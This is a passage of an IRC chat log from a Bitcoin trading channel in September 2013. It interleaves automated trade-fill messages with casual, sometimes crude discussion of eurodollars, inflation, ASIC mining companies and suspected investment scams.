and Banking, Part One" Sep 03 08:40:38 fucking hell the internet makes people stupid. Sep 03 08:40:54 yea coursera requires you to get a login Sep 03 08:40:55 [HAVELOCK] [AM100] 64 @ 0.02299 = 1.4714 BTC [+] Sep 03 08:40:58 taub you understand that it is perfectly moot what nobody writes on a page ? Sep 03 08:40:58 free tho Sep 03 08:41:08 unless he's somebody, i don't give a shiot what he thinks he thinks. Sep 03 08:41:14 [HAVELOCK] [AM100] 100 @ 0.023 = 2.3 BTC [+] Sep 03 08:41:21 he's wrong by default and absolutely stupid for even doing this sort of camwhoring without a cam. Sep 03 08:41:22 well its basically a university course you can watch on a website Sep 03 08:41:27 mk. Sep 03 08:41:38 coursera offers a lot of interesting courses Sep 03 08:41:52 and i found this one particularly interesting so i thought i'd share it with my fellow finance nerds Sep 03 08:42:11 but interesting why ? Sep 03 08:42:41 want to get a better understanding of the current banking system Sep 03 08:42:52 for example i still dont know what a eurodollar really is Sep 03 08:43:11 [HAVELOCK] [AM100] 10 @ 0.02378 = 0.2378 BTC [+] Sep 03 08:43:15 [HAVELOCK] [AM100] 10 @ 0.023789 = 0.2379 BTC [+] Sep 03 08:43:17 [BTCTC] [BITVPS] 2 @ 0.002549 = 0.0051 BTC [+] Sep 03 08:43:19 [HAVELOCK] [AM100] 34 @ 0.02379 = 0.8089 BTC [+] Sep 03 08:43:22 [HAVELOCK] [AM100] 50 @ 0.02389898 = 1.1949 BTC [+] Sep 03 08:43:25 [HAVELOCK] [AM100] 396 @ 0.02389899 = 9.464 BTC [+] Sep 03 08:43:44 [HAVELOCK] [AM100] 54 @ 0.02389899 = 1.2905 BTC [+] Sep 03 08:43:45 eurodollars are dollar deposits held in european originally, currently foreign banks. Sep 03 08:43:51 they're not subject to regulation by the usg. Sep 03 08:44:00 which is why they trade at a premium over the domestic shit. Sep 03 08:44:23 [HAVELOCK] [AM100] 32 @ 0.0239 = 0.7648 BTC [+] Sep 03 08:44:39 [HAVELOCK] [AM100] 1 @ 0.0239 BTC [+] Sep 03 08:44:58 ic Sep 03 08:45:04 what do you mean by "not subject to regulation by the usg"? Sep 03 08:45:34 exactly that. Sep 03 08:46:16 what regulations does the USG impose upon shitbucks that imposes a penalty relative to eurodollars? Sep 03 08:46:29 impose Sep 03 08:46:33 incur? Sep 03 08:47:15 for instance you can't send usdollars to "terrorists". Sep 03 08:47:23 you can however send euro-dollars to anyone you please. Sep 03 08:48:03 by send do you mean via wire transfer to another bank account? or literally pull out box up and post to another human somewhere/. Sep 03 08:48:19 if i have a bill from my cigar supplier in cuba for 10k usd, i can't use 10k usd from my ny bank account to pay it. i can however use 10k usd from my french bank to pay it just fine. Sep 03 08:49:00 what if you wire 10k from your ny bank? Sep 03 08:49:00 since the us is a greatly impopular rogue state, the pressure on the currency is marked. Sep 03 08:49:07 they won't do it. Sep 03 08:49:10 to your french bank? Sep 03 08:50:37 what of it ? or what are you asking ? Sep 03 08:50:56 can one wire shitbucks to france and from thence on to the terrists? Sep 03 08:50:59 once its in the french bank it's an eurodollar Sep 03 08:51:22 well, im not entirely sure these days how it works. Sep 03 08:51:30 mh Sep 03 08:51:32 it's one of the things the new dodd frank stuff is for. Sep 03 08:51:44 but it used to be the case. Sep 03 08:52:20 fascinating. where can i see this delta in action? Sep 03 08:52:35 in the eurodollar futures for instance. Sep 03 08:58:16 anyway. because the us govt can't be taken seriously, the financial world has settled on the non-us held dollar as the measure of dollars, Sep 03 08:58:43 and so pretty much all trade taking place with delivery in dollars will reference eurodollars (which really means, non-us dollars) rather than the us-dollars. Sep 03 08:59:31 doesn't really help tho right? if the us prints even more shitbucks even eurodollars are worth less, correct? Sep 03 09:00:37 [HAVELOCK] [XBOND] 5 @ 0.00111 = 0.0056 BTC [-] Sep 03 09:01:58 mircea_popescu: ? Sep 03 09:04:44 benkay well yes, these are distinct items. Sep 03 09:05:05 inflation is one thing, administrative limitation of the use of your held reserves is another thing. Sep 03 09:05:36 the reason the eurodollar future is the most traded derivative in the world is due exactly to the fact that people are trying to hedge the inflation part. Sep 03 09:08:05 it wouldn't work worth a shit if they tried to hedge both parts together, which is why they got separated. this incidentally is how finance works, isolates risks by types much like science isolates variables. Sep 03 09:08:47 :o Sep 03 09:08:48 if they hadn't the us govt would simply pretend like there's no inflation, but you just can't spend your dollars sorry. they ARE doing it in any other field where there's no easy recourse, such as for instance employment. Sep 03 09:08:59 where did you learn all that btw Sep 03 09:09:13 well i'm one of the few people in bitcoin that knows finance. Sep 03 09:11:57 several questions, mircea_popescu: Sep 03 09:11:58 pankkake t'as vu "des pissenlits par la racine" ? Sep 03 09:12:06 how do you hedge the inflation with a shitbuck-denominated asset? Sep 03 09:12:34 ahh, ok Sep 03 09:13:21 yea but where did you learn it Sep 03 09:13:24 benkay it's one huge concerto of "they're going to be 6 ounces stupid this month" "no, just 5.4" "no really, 6.2" Sep 03 09:13:27 just read books or go to uni somewhere? Mp Sep 03 09:13:33 all this gets mixed together in the market an a price emerges. Sep 03 09:13:52 oops. sorry. damn lag. Sep 03 09:13:53 and just what do you mean by "you can't spend your dollars" Sep 03 09:14:25 taub before bitcoin i was doing business consulting. this isn't the sort of thing books or universities teach, other than in a very basic and fundamentally useless manner. Sep 03 09:14:28 and what are they doing in the employment field that's different from the printing of shutbucks? Sep 03 09:14:57 benkay well, about 60% of work able adults in the us have a job. the us official unemployment is 10%. Sep 03 09:15:04 the difference is hidden through administrative means. Sep 03 09:15:14 oh sure Sep 03 09:15:16 suppose you had 10k in the bank but were not allowed to spend more than 1k a year Sep 03 09:15:27 the difference would be hidden [from the market] through administrative menas. Sep 03 09:15:38 this would prevent prices from going up, as you can't use your supposed dollars. Sep 03 09:16:02 kk Sep 03 09:16:28 mmmk Sep 03 09:16:43 and what do you mean by six ounces stupid? Sep 03 09:17:01 print 600tons of bux. no just 500 tons of bux. Sep 03 09:17:01 is this some tie between libor and monetary base inflation? Sep 03 09:17:23 ding ding ding Sep 03 09:17:24 gotcha Sep 03 09:17:34 obviously inflation is the lowest basic component of any interest rate. Sep 03 09:17:54 i won't lend to you at 5% if i figure the inflation will be 6% now will i. Sep 03 09:18:46 that'd be bitcoin dumb Sep 03 09:18:51 lol Sep 03 09:19:36 anyway. this is the heart of human civilisation, finance. it distributes resources and in the end draws the limit for the lives of everyone. Sep 03 09:19:37 [BTCTC] [DMS.SELLING] 24 @ 0.01315 = 0.3156 BTC [+] Sep 03 09:19:53 certainly an intellectually rewarding field to try and comprehend. Sep 03 09:20:45 so how would one go about backing out the delta between US- and foreign-held shitbucks from the eurodollar contract? Sep 03 09:20:54 future Sep 03 09:21:47 [BTCTC] [ACTIVEMINING] 1 @ 0.003551 BTC [+] Sep 03 09:22:33 in a first approximation you could extract something by comparing Ts and eurodollars Sep 03 09:22:51 ts are promises of the usg to pay usd. eurodollars are promises of foreigners to pay usd. Sep 03 09:22:59 awesome Sep 03 09:23:27 depends what you;'re ultimately trying to achieve anyway. Sep 03 09:30:13 [HAVELOCK] [XBOND] 18 @ 0.00111 = 0.02 BTC [-] Sep 03 09:33:17 [HAVELOCK] [VTX] 16 @ 0.6 = 9.6 BTC [+] **** BEGIN LOGGING AT Tue Sep 3 17:53:32 2013 Sep 03 17:54:30 [HAVELOCK] [XBOND] 100 @ 0.00106 = 0.106 BTC [+] Sep 03 17:54:49 [HAVELOCK] [AM100] 1 @ 0.0236 BTC [+] Sep 03 17:54:56 [MPEX] [S.MPOE] 3904 @ 0.0008779 = 3.4273 BTC [+] Sep 03 17:57:27 [HAVELOCK] [AM100] 10 @ 0.02195 = 0.2195 BTC [-] Sep 03 17:58:25 [HAVELOCK] [CFIG] 3 @ 0.13010001 = 0.3903 BTC [+] Sep 03 17:58:41 [BTCTC] [ASICMINER-PT] 1 @ 2.45 BTC [-] Sep 03 17:59:09 [BTCTC] [ASICMINER-PT] 1 @ 2.44 BTC [-] Sep 03 18:00:33 [BTCTC] [BTC-GROWTH] 1 @ 0.1001 BTC [-] Sep 03 18:03:15 [MPEX] [S.MPOE] 6800 @ 0.00087639 = 5.9595 BTC [-] Sep 03 18:15:54 ;;ticker Sep 03 18:15:55 MtGox BTCUSD ticker | Best bid: 145.38595, Best ask: 146.47446, Bid-ask spread: 1.08851, Last trade: 146.47448, 24 hour volume: 12890.48790843, 24 hour low: 142.20000, 24 hour high: 148.90893, 24 hour vwap: 145.55231 Sep 03 18:18:16 [BTCTC] [ASICMINER-PT] 2 @ 2.455 = 4.91 BTC [+] Sep 03 18:18:34 [BTCTC] [BTC-GROWTH] 1 @ 0.1 BTC [-] Sep 03 18:19:21 http://trilema.com/2013/bitbet-august-2013-statement/ Sep 03 18:19:24 BitBet, August 2013 Statement pe Trilema - Un blog de Mircea Popescu. Sep 03 18:20:49 I'm just happy the whole bitfury thing is over and done with Sep 03 18:21:36 well ya but the labcoin thing is just starting. Sep 03 18:21:49 http://bitbet.us/bet/521/labcoins-own-130nm-design-sample-chips-will-be/#c1360 Sep 03 18:21:54 BitBet - Labcoins own 130nm design sample chips will be received by testers by 12TH SEPT 2013 Sep 03 18:22:03 by the size of the comment stack it will probably be even more hotly debated! Sep 03 18:22:13 O that one is a given no no Sep 03 18:22:18 tho in fairness maybe the labcoin shills are too stupid to show uo Sep 03 18:22:31 also, for next month there's http://bitbet.us/bet/472/kncminer-will-deliver-asic-devices-before-october-1st/ Sep 03 18:22:34 I should just bet on that one, it was created by a troll Sep 03 18:22:51 Created to stir a pump Sep 03 18:22:52 whattt? Sep 03 18:23:02 the knc one? Sep 03 18:23:09 no the labcoin one Sep 03 18:24:27 i like the periodicity on that incoming btc graph Sep 03 18:25:30 sorta 7-day. Sep 03 18:29:05 so eve is pushing a 800mb patch what in the loving hell. Sep 03 18:30:11 [BTCTC] [LABCOIN] 4 @ 0.003551 = 0.0142 BTC [-] Sep 03 18:31:51 http://bitbet.us/bet/507/hashfast-will-deliver-asic-devices-to-spec-before/ Sep 03 18:31:54 o jezuz another one Sep 03 18:31:56 BitBet - Hashfast will deliver ASIC devices to spec before November 1st Sep 03 18:32:03 just how many of these asic manufacturers are there ? Sep 03 18:32:04 [BTCTC] [COGNITIVE] 2 @ 0.31 = 0.62 BTC [-] Sep 03 18:32:27 the drama must be delivered Sep 03 18:32:30 there is also www.cointerra.com Sep 03 18:32:36 and alydia Sep 03 18:32:51 apparently these aren't even worthy of betting on Sep 03 18:33:03 yet Sep 03 18:33:15 so in total there's what, about 10 ? Sep 03 18:33:19 "Prior to founding CoinTerra, Ravi was Lead CPU Architect at Samsung Corporation." Sep 03 18:33:54 [MPEX] [S.MPOE] 5500 @ 0.00087381 = 4.806 BTC [-] Sep 03 18:34:06 dexX7 the problem with these statements is that there's no chain of verification. Sep 03 18:34:19 when i moved to bitcoin i said so on my blog, and the people that knew me KNEW it was really me. Sep 03 18:34:38 [BTCTC] [COGNITIVE] 1 @ 0.31 BTC [-] Sep 03 18:34:40 some douche pretending to be someone cool on this side of the cool isn't particularly trustworthy on that alone. Sep 03 18:34:47 i'm still not ready to believe labcoin is even real Sep 03 18:35:03 so, is the cointerra thing announced on the known blog of ravi the lead cpu architect of samsung blog ? Sep 03 18:35:30 [BTCTC] [LABCOIN] 5 @ 0.00355 = 0.0178 BTC [-] Sep 03 18:35:30 my guess is he is formerly of samsung Sep 03 18:35:33 [BTCTC] [LABCOIN] 115 @ 0.003547 = 0.4079 BTC [-] Sep 03 18:35:34 [BTCTC] [LABCOIN] 16 @ 0.003545 = 0.0567 BTC [-] Sep 03 18:35:43 [BTCTC] [TAT.ASICMINER] 2 @ 0.02382 = 0.0476 BTC [+] Sep 03 18:35:45 [BTCTC] [TAT.ASICMINER] 10 @ 0.02383 = 0.2383 BTC [+] Sep 03 18:35:57 they have a nice video talking about how special they are Sep 03 18:36:04 https://www.google.com/search?q=Lead+CPU+Architect+at+Samsung&complete=0 Sep 03 18:36:12 look at the sources on that : reddit and some bitcoin spamsites. Sep 03 18:36:33 it makes me suspicious. Sep 03 18:37:43 yup Sep 03 18:37:44 true Sep 03 18:37:50 the one hit on arstechnica.com is from the cyruss bitcoin guy, which incidentally may end up an ugly mar on his reputation as afair he was quite well researched Sep 03 18:37:57 and other than that... pr newswire ? Sep 03 18:39:03 and i mean ravi. if i were to pick up the phone and call samsung hr, who do i ask for ? "ravi" ? Sep 03 18:39:09 http://www.linkedin.com/in/ravidiyengar << if that profile is legit, so is he. some weeks ago he linked to cointerra from this profile Sep 03 18:39:10 Ravi Iyengar | LinkedIn Sep 03 18:39:26 i can be mircea popescu but ravi dude hasta be ravi, like madonna. cause he's not into business, he's into entertainment. Sep 03 18:39:29 aha! Sep 03 18:40:13 dexX7 well thanks for that, now at least there's something definite to go by. Sep 03 18:40:31 [MPEX] [S.MPOE] 2448 @ 0.00087381 = 2.1391 BTC [-] Sep 03 18:41:51 for the lulz department: Ravi Iyengar engineer at government Mysore Area, India | Defense & Space Sep 03 18:42:25 https://bitcointalk.org/index.php?topic=267552.msg2869516#msg2869516 though the reference was removed later Sep 03 18:42:30 Cointerra Mining ASIC coming soon Sep 03 18:43:22 [HAVELOCK] [KCIM] 1 @ 0.34 BTC [+] Sep 03 18:43:24 [HAVELOCK] [KCIM] 1 @ 0.2599 BTC [-] Sep 03 18:44:01 [BTCTC] [BASIC-MINING] 2 @ 0.14 = 0.28 BTC [+] Sep 03 18:44:09 hum. Sep 03 18:44:30 well, vague at best, i'd say at this point. Sep 03 18:45:03 yup Sep 03 18:45:11 http://www.theverge.com/2013/9/3/4686942/file-hosting-services-take-big-hit-with-ruling-against-hotfile Sep 03 18:45:14 File-hosting services take big hit with ruling against Hotfile | The Verge Sep 03 18:45:55 [BTCTC] [LABCOIN] 193 @ 0.003545 = 0.6842 BTC [-] Sep 03 18:47:10 [BTCTC] [TAT.ASICMINER] 4 @ 0.02399 = 0.096 BTC [+] Sep 03 18:48:51 [BTCTC] [DMS.PURCHASE] 1 @ 0.01582 BTC [-] Sep 03 18:51:29 [HAVELOCK] [SDSTM] 1 @ 0.0035 BTC [-] Sep 03 18:52:22 dexX7 here's an item courtesy of the mpex scouring department : everyone else's name in the cointerra team page is used to name the pic. except in the case of ravi guy, the pic is named navi1. Sep 03 18:53:46 [BTCTC] [DMS.SELLING] 3 @ 0.01315 = 0.0395 BTC [+] Sep 03 18:55:09 [BTCTC] [DMS.SELLING] 2 @ 0.01316 = 0.0263 BTC [+] Sep 03 18:55:10 [BTCTC] [DMS.SELLING] 132 @ 0.01316 = 1.7371 BTC [+] Sep 03 18:55:59 um there is jim1.jpg, naveed1.jpg, navi1.jpg and timo1.jpg Sep 03 18:56:20 [BTCTC] [LABCOIN] 520 @ 0.003599 = 1.8715 BTC [+] Sep 03 18:56:21 [BTCTC] [LABCOIN] 260 @ 0.0036 = 0.936 BTC [+] Sep 03 18:56:21 [BTCTC] [LABCOIN] 28 @ 0.003642 = 0.102 BTC [+] Sep 03 18:56:23 [BTCTC] [LABCOIN] 659 @ 0.003642 = 2.4001 BTC [+] Sep 03 18:56:24 [BTCTC] [LABCOIN] 175 @ 0.003643 = 0.6375 BTC [+] Sep 03 18:56:25 [BTCTC] [LABCOIN] 1000 @ 0.00365 = 3.65 BTC [+] Sep 03 18:56:26 [BTCTC] [LABCOIN] 1177 @ 0.00366 = 4.3078 BTC [+] Sep 03 18:56:27 [BTCTC] [LABCOIN] 100 @ 0.003675 = 0.3675 BTC [+] Sep 03 18:56:28 [BTCTC] [LABCOIN] 98 @ 0.003699 = 0.3625 BTC [+] Sep 03 18:56:29 [BTCTC] [LABCOIN] 93 @ 0.003699 = 0.344 BTC [+] Sep 03 18:56:29 [BTCTC] [LABCOIN] 300 @ 0.00371 = 1.113 BTC [+] Sep 03 18:56:31 [BTCTC] [LABCOIN] 30 @ 0.003711 = 0.1113 BTC [+] Sep 03 18:56:31 [BTCTC] [LABCOIN] 20 @ 0.003718 = 0.0744 BTC [+] Sep 03 18:56:32 [BTCTC] [LABCOIN] 99 @ 0.003728 = 0.3691 BTC [+] Sep 03 18:56:33 [BTCTC] [LABCOIN] 709 @ 0.003728 = 2.6432 BTC [+] Sep 03 18:56:34 oh i see Sep 03 18:56:34 [BTCTC] [LABCOIN] 100 @ 0.00373 = 0.373 BTC [+] Sep 03 18:56:35 [BTCTC] [LABCOIN] 70 @ 0.00374 = 0.2618 BTC [+] Sep 03 18:56:36 [BTCTC] [LABCOIN] 100 @ 0.003743 = 0.3743 BTC [+] Sep 03 18:56:37 [BTCTC] [LABCOIN] 4351 @ 0.003744 = 16.2901 BTC [+] Sep 03 18:56:38 [BTCTC] [LABCOIN] 2547 @ 0.003747 = 9.5436 BTC [+] Sep 03 18:56:39 [BTCTC] [LABCOIN] 664 @ 0.003752 = 2.4913 BTC [+] Sep 03 18:56:41 [BTCTC] [DMS.SELLING] 8 @ 0.01317 = 0.1054 BTC [+] Sep 03 18:56:41 [BTCTC] [DMS.SELLING] 2 @ 0.01317 = 0.0263 BTC [+] Sep 03 18:56:49 r and n Sep 03 18:57:12 it seems indeed Jeff Rupley moved in january of this year as "Principal CPU Architect" at samsung austin r&d Sep 03 18:57:12 [HAVELOCK] [AM100] 8 @ 0.02195 = 0.1756 BTC [-] Sep 03 18:57:47 [BTCTC] [DMS.SELLING] 3 @ 0.01318 = 0.0395 BTC [+] Sep 03 18:58:23 [HAVELOCK] [AM100] 8 @ 0.02190001 = 0.1752 BTC [-] Sep 03 18:59:07 [BTCTC] [DMS.SELLING] 6 @ 0.0132 = 0.0792 BTC [+] Sep 03 18:59:07 [BTCTC] [DMS.SELLING] 94 @ 0.0132 = 1.2408 BTC [+] Sep 03 18:59:39 [BTCTC] [DMS.SELLING] 26 @ 0.0132 = 0.3432 BTC [+] Sep 03 18:59:45 hmm Sep 03 19:00:13 [HAVELOCK] [DEALCO] 1024 @ 0.01 = 10.24 BTC Sep 03 19:00:18 [HAVELOCK] [DEALCO] 9000 @ 0.01 = 90 BTC Sep 03 19:00:22 got something Sep 03 19:00:32 http://www.open-silicon.com/management/ + http://youtu.be/K199f61n4qM?t=2m31s Sep 03 19:00:35 Management | Open-Silicon Sep 03 19:00:42 [HAVELOCK] [DEALCO] 1000 @ 0.01 = 10 BTC Sep 03 19:00:45 [HAVELOCK] [DEALCO] 400 @ 0.01 = 4 BTC Sep 03 19:00:48 [HAVELOCK] [DEALCO] 1000 @ 0.01 = 10 BTC Sep 03 19:00:50 [HAVELOCK] [DEALCO] 261 @ 0.01 = 2.61 BTC Sep 03 19:00:52 [HAVELOCK] [DEALCO] 500 @ 0.01 = 5 BTC Sep 03 19:00:54 [HAVELOCK] [DEALCO] 10000 @ 0.01 = 100 BTC Sep 03 19:00:56 [HAVELOCK] [DEALCO] 400 @ 0.01 = 4 BTC Sep 03 19:00:59 [HAVELOCK] [DEALCO] 25 @ 0.01 = 0.25 BTC Sep 03 19:01:01 [HAVELOCK] [DEALCO] 495 @ 0.01 = 4.95 BTC Sep 03 19:01:03 [HAVELOCK] [DEALCO] 100 @ 0.01 = 1 BTC Sep 03 19:01:04 hmmm Sep 03 19:01:04 [HAVELOCK] [DEALCO] 4 @ 0.01 = 0.04 BTC Sep 03 19:01:07 [HAVELOCK] [DEALCO] 54 @ 0.01 = 0.54 BTC Sep 03 19:01:11 Did this just go live? Sep 03 19:01:12 [HAVELOCK] [DEALCO] 10000 @ 0.01 = 100 BTC Sep 03 19:01:13 [HAVELOCK] [DEALCO] 217 @ 0.01 = 2.17 BTC Sep 03 19:01:16 [BTCTC] [ACTIVEMINING] 10 @ 0.003669 = 0.0367 BTC [-] Sep 03 19:01:17 [BTCTC] [ACTIVEMINING] 20 @ 0.00367 = 0.0734 BTC [+] Sep 03 19:01:18 [BTCTC] [ACTIVEMINING] 2 @ 0.003674 = 0.0073 BTC [+] Sep 03 19:01:19 [BTCTC] [ACTIVEMINING] 1 @ 0.003675 BTC [+] Sep 03 19:01:20 [BTCTC] [ACTIVEMINING] 516 @ 0.003687 = 1.9025 BTC [+] Sep 03 19:01:21 [BTCTC] [ACTIVEMINING] 1 @ 0.003688 BTC [+] Sep 03 19:01:22 Looks like it Sep 03 19:01:23 [BTCTC] [ACTIVEMINING] 426 @ 0.00369 = 1.5719 BTC [+] Sep 03 19:01:24 [BTCTC] [ACTIVEMINING] 514 @ 0.003726 = 1.9152 BTC [+] Sep 03 19:01:24 http://en.wikipedia.org/wiki/Open-Silicon has some reference Sep 03 19:01:24 [BTCTC] [ACTIVEMINING] 257 @ 0.003728 = 0.9581 BTC [+] Sep 03 19:01:25 [HAVELOCK] [DEALCO] 1000 @ 0.01 = 10 BTC Sep 03 19:01:27 [HAVELOCK] [DEALCO] 200 @ 0.01 = 2 BTC Sep 03 19:01:29 [HAVELOCK] [DEALCO] 1500 @ 0.01 = 15 BTC Sep 03 19:01:31 [HAVELOCK] [DEALCO] 1 @ 0.01 BTC Sep 03 19:01:33 [HAVELOCK] [DEALCO] 1666 @ 0.01 = 16.66 BTC Sep 03 19:01:36 [HAVELOCK] [DEALCO] 29 @ 0.01 = 0.29 BTC Sep 03 19:01:38 [HAVELOCK] [DEALCO] 56 @ 0.01 = 0.56 BTC Sep 03 19:01:41 [HAVELOCK] [DEALCO] 1000 @ 0.01 = 10 BTC Sep 03 19:01:43 [HAVELOCK] [DEALCO] 200 @ 0.01 = 2 BTC Sep 03 19:01:44 [HAVELOCK] [DEALCO] 2 @ 0.01 = 0.02 BTC Sep 03 19:01:47 [HAVELOCK] [DEALCO] 50 @ 0.01 = 0.5 BTC Sep 03 19:01:49 [HAVELOCK] [DEALCO] 1000 @ 0.01 = 10 BTC Sep 03 19:01:51 [HAVELOCK] [DEALCO] 660 @ 0.01 = 6.6 BTC Sep 03 19:01:54 [HAVELOCK] [DEALCO] 1000 @ 0.01 = 10 BTC Sep 03 19:01:56 [HAVELOCK] [DEALCO] 1 @ 0.01 BTC Sep 03 19:01:59 [HAVELOCK] [DEALCO] 1000 @ 0.01 = 10 BTC Sep 03 19:02:23 Still dont get how dealco makes money Sep 03 19:02:33 [BTCTC] [COGNITIVE] 16 @ 0.31 = 4.96 BTC [-] Sep 03 19:02:37 they guarantee 1% per month! Sep 03 19:02:45 haha Sep 03 19:02:51 Ive seen this movie Sep 03 19:03:03 they broke havelock Sep 03 19:03:33 yep Sep 03 19:03:55 small IPO = a dozen flippers fighting to give some web designer 500btc Sep 03 19:04:07 :P Sep 03 19:04:09 yep Sep 03 19:04:10 :D Sep 03 19:04:13 lol Sep 03 19:04:15 [BTCTC] [ACTIVEMINING] 250 @ 0.003795 = 0.9488 BTC [+] Sep 03 19:04:16 [BTCTC] [ACTIVEMINING] 1 @ 0.003856 BTC [+] Sep 03 19:04:16 [BTCTC] [ACTIVEMINING] 448 @ 0.003859 = 1.7288 BTC [+] Sep 03 19:04:17 [BTCTC] [ACTIVEMINING] 30 @ 0.003863 = 0.1159 BTC [+] Sep 03 19:04:18 [BTCTC] [ACTIVEMINING] 48 @ 0.00389 = 0.1867 BTC [+] Sep 03 19:04:19 it's a gem, seriously now. Sep 03 19:04:19 [BTCTC] [ACTIVEMINING] 536 @ 0.003896 = 2.0883 BTC [+] Sep 03 19:04:20 [BTCTC] [ACTIVEMINING] 48 @ 0.003953 = 0.1897 BTC [+] Sep 03 19:04:27 [BTCTC] [DMS.SELLING] 2 @ 0.01322 = 0.0264 BTC [+] Sep 03 19:04:29 exactly the same principle at work, but with much better management and crowd control. Sep 03 19:04:53 Im going to ipo a company that flips ipos Sep 03 19:05:00 its like the ultimate Flipper asset Sep 03 19:05:03 meta. Sep 03 19:05:09 so meta Sep 03 19:05:17 isn't that Smidge? Sep 03 19:05:22 flipcoin Sep 03 19:05:25 [BTCTC] [DMS.PURCHASE] 1 @ 0.01582 BTC [-] Sep 03 19:05:34 I could just release the coin Sep 03 19:05:35 call it Meta, and your logo could be the metamphetamine molecule. Sep 03 19:05:36 [HAVELOCK] [DEALCO] 25 @ 0.01 = 0.25 BTC Sep 03 19:05:38 [BTCTC] [ACTIVEMINING] 448 @ 0.003996 = 1.7902 BTC [+] Sep 03 19:05:39 [BTCTC] [ACTIVEMINING] 1 @ 0.004 BTC [+] Sep 03 19:05:40 each coin is entitled to a percantage of the flips Sep 03 19:05:41 [BTCTC] [ACTIVEMINING] 300 @ 0.004 = 1.2 BTC [+] Sep 03 19:05:42 [BTCTC] [ACTIVEMINING] 48 @ 0.004016 = 0.1928 BTC [+] Sep 03 19:05:43 [BTCTC] [ACTIVEMINING] 17 @ 0.004031 = 0.0685 BTC [+] Sep 03 19:05:43 [HAVELOCK] [DEALCO] 105 @ 0.01 = 1.05 BTC Sep 03 19:05:46 [HAVELOCK] [DEALCO] 9 @ 0.01 = 0.09 BTC Sep 03 19:05:49 [HAVELOCK] [DEALCO] 500 @ 0.01 = 5 BTC Sep 03 19:05:56 [HAVELOCK] [DEALCO] 10 @ 0.01 = 0.1 BTC Sep 03 19:05:59 [HAVELOCK] [DEALCO] 9 @ 0.01 = 0.09 BTC Sep 03 19:06:01 [HAVELOCK] [DEALCO] 1000 @ 0.01 = 10 BTC Sep 03 19:06:06 [BTCTC] [DMS.PURCHASE] 1 @ 0.0158 BTC [-] Sep 03 19:06:08 [HAVELOCK] [DEALCO] 20 @ 0.01 = 0.2 BTC Sep 03 19:06:13 you can offer a prize to both the bagholder and whoever sells at the highest price Sep 03 19:06:17 [BTCTC] [DMS.PURCHASE] 1 @ 0.01578 BTC [-] Sep 03 19:06:18 [HAVELOCK] [DEALCO] 80 @ 0.01 = 0.8 BTC Sep 03 19:06:24 10000000 coins to each ! Sep 03 19:06:26 [HAVELOCK] [DEALCO] 1 @ 0.01 BTC Sep 03 19:06:29 [HAVELOCK] [DEALCO] 500 @ 0.01 = 5 BTC Sep 03 19:06:31 [BTCTC] [ACTIVEMINING] 10 @ 0.003999 = 0.04 BTC [-] Sep 03 19:06:32 flipcoisn that is Sep 03 19:06:33 [BTCTC] [ACTIVEMINING] 378 @ 0.004048 = 1.5301 BTC [+] Sep 03 19:06:35 [BTCTC] [ACTIVEMINING] 50 @ 0.004051 = 0.2026 BTC [+] Sep 03 19:06:35 [BTCTC] [ACTIVEMINING] 372 @ 0.004051 = 1.507 BTC [+] Sep 03 19:06:36 [HAVELOCK] [DEALCO] 380 @ 0.01 = 3.8 BTC Sep 03 19:06:43 lol 4k dealco units left Sep 03 19:06:44 [HAVELOCK] [DEALCO] 3000 @ 0.01 = 30 BTC Sep 03 19:06:47 [HAVELOCK] [DEALCO] 200 @ 0.01 = 2 BTC Sep 03 19:06:54 [HAVELOCK] [LABCO] 4 @ 0.003001 = 0.012 BTC [-] Sep 03 19:06:56 [HAVELOCK] [LABCO] 26 @ 0.003 = 0.078 BTC [-] Sep 03 19:07:07 [HAVELOCK] [DEALCO] 316 @ 0.01 = 3.16 BTC Sep 03 19:07:16 gone Sep 03 19:07:18 sold out Sep 03 19:07:18 lol Sep 03 19:07:33 Now Sell Sep 03 19:07:39 @ .03 Sep 03 19:07:41 last we hear about it, before the obligatory "class action jacket" on forum ? Sep 03 19:07:43 [MPEX] [S.MPOE] 2900 @ 0.0008687 = 2.5192 BTC [-] Sep 03 19:07:44 [MPEX] [S.MPOE] 2650 @ 0.0008679 = 2.2999 BTC [-] Sep 03 19:09:15 now let's see if the flippers are also willing togemn it up Sep 03 19:09:16 I do not understand dealco, isnt is just localbitcoins? Sep 03 19:09:20 to gem it up* Sep 03 19:09:24 [HAVELOCK] [XBOND] 1 @ 0.00107 BTC [+] Sep 03 19:09:27 Its BETTER Sep 03 19:09:28 didn't follow.. but they are something like localbitcoin? Sep 03 19:09:31 [HAVELOCK] [XBOND] 10 @ 0.00105002 = 0.0105 BTC [-] Sep 03 19:09:32 =D Sep 03 19:09:38 [HAVELOCK] [XBOND] 527 @ 0.00105001 = 0.5534 BTC [-] Sep 03 19:09:44 [HAVELOCK] [XBOND] 225 @ 0.00105 = 0.2363 BTC [-] Sep 03 19:09:47 http://www.dealco.in/havelock Sep 03 19:09:49 Havelock IPO | DealCoin - In-Person Bitcoin Exchange Sep 03 19:09:50 [HAVELOCK] [XBOND] 10 @ 0.00105 = 0.0105 BTC [-] Sep 03 19:09:53 localbitcoin gem doesnt exist Sep 03 19:09:54 [HAVELOCK] [XBOND] 12 @ 0.0010459 = 0.0126 BTC [-] Sep 03 19:09:57 thats the difference Sep 03 19:10:01 [HAVELOCK] [XBOND] 20 @ 0.00104576 = 0.0209 BTC [-] Sep 03 19:10:09 [HAVELOCK] [XBOND] 965 @ 0.00104575 = 1.0091 BTC [-] Sep 03 19:10:28 ThickAsThieves i'll give you even odds that many (most?) of these pseudo-mining offerings consisted of people trying to reimplement the famous pirate scams of the day. they collected bitcoin from suckers, bought AM in the hopes of AM going up, and with the intention of paying a portion of the proceeds to their suckers. Sep 03 19:10:31 AM went down. Sep 03 19:10:52 https://www.havelockinvestments.com/order.php?symbol=DEALCO wow empty Sep 03 19:11:08 if they really were using those coins on AM, wouldnt AM have gone up? Sep 03 19:11:25 no, because people in the know / in the right in group were selling at the same time Sep 03 19:11:29 it DID initially go up. Sep 03 19:11:40 but... suckers don't listen, and so suckers hold bags. Sep 03 19:11:53 but what mining op fits into that timeframe? Sep 03 19:11:57 activemining Sep 03 19:11:59 any others? Sep 03 19:12:18 haha i bet this discussion will continue if labcoin announces their 3 th hashing.. or something like "they bought some bitfuries" Sep 03 19:12:30 actually here's a good thing you could publish on your blog : timeline of the miner scams and miner investment scams. Sep 03 19:12:47 [BTCTC] [DMS.PURCHASE] 1 @ 0.01578 BTC [-] Sep 03 19:12:49 dexX7 announcement means shit. if they win the bitbet bet it might matter. Sep 03 19:12:52 could be interesting to chart them all Sep 03 19:13:01 certainly useful for teh general public. Sep 03 19:13:32 start with where AM went past 0.5, because that's where it all 